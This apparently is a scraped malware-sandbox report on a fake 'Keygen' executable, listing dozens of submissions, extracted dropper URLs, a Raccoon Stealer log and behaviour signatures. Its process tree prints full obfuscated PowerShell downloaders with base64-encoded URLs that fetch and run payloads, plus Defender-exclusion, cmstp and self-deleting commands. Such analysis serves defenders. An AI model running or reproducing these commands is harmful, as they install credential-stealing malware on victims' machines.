Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

8

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

8

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    73s
  • max time network
    159s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (18).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 03:38:54 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (745 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 26 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (18).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (18).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:996
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2233.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (18).exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1032
      • C:\Users\Admin\AppData\Local\Temp\2233.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1600
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2233.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3848
          • C:\Users\Public\bud.exe
            "C:\Users\Public\bud.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5012
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4112
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4312
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4312 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\575120869473053\\* & exit
                  8⤵
                    PID:612
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4312
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1744
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4120
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4360
              • C:\Users\Public\bud.exe
                "C:\Users\Public\bud.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4268
                • C:\Users\Admin\AppData\Local\Temp\sY4V3ugIn1.exe
                  "C:\Users\Admin\AppData\Local\Temp\sY4V3ugIn1.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4248
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\sY4V3ugIn1.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5060
                • C:\Users\Admin\AppData\Local\Temp\rlgeQg7oxE.exe
                  "C:\Users\Admin\AppData\Local\Temp\rlgeQg7oxE.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1664
                • C:\Users\Admin\AppData\Local\Temp\qEAK8mYfTf.exe
                  "C:\Users\Admin\AppData\Local\Temp\qEAK8mYfTf.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:2664
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\cznstw0o.inf
                    8⤵
                      PID:2228
                  • C:\Users\Admin\AppData\Local\Temp\JDI8pfhw4m.exe
                    "C:\Users\Admin\AppData\Local\Temp\JDI8pfhw4m.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3756
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3328
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\bud.exe"
                    7⤵
                      PID:4232
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:4176
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2233.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2184
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2800
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:2220
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\2233.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2956
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + 